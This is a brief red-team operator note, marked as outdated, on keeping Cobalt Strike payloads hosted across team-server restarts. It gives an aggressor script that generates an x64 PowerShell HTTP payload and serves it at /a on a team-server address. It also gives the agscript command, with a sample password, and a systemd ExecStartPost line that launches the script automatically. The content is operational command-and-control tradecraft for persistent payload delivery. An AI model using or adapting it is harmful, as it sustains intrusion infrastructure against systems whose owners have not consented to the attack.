Outdated

This note is no longer useful due to a Cobalt Strike version update.

Normally, hosted files on Cobalt Strike do not persist when team server restarts, which may present a problem for persistence methods that depend on scripted web delivery, hosted files, etc. To alleviate this annoyance, we can set up a headless Cobalt Strike client to execute an aggressor script on launch, which will host payloads and files as defined.

To start a headless client, use the format agscript [host] [port] [user] [password] [/path/to/aggressor/script.cna].

Sample aggressor script:

# host_payloads.cna
 
# handles event "on ready"
on ready {
    # protocol, payload type, payload architecture
    $payload = artifact_payload("http", "powershell", "x64");
    # host, port, URI, payload object, MIME type, description, use HTTPS or not
    site_host("10.10.5.50", 80, "/a", $payload, "text/plain", "Auto Web Delivery (PowerShell)", false);
}

We can start this aggressor script with the following:

./agscript 127.0.0.1 50050 headless Passw0rd! host_payloads.cna

To make it start with the teamserver service, add this to teamserver.service file (see Cobalt Strike team server as systemd service):

ExecStartPost=/bin/sh -c '/usr/bin/sleep 30; /home/attacker/cobaltstrike/agscript 127.0.0.1 50050 headless Passw0rd! host_payloads.cna &'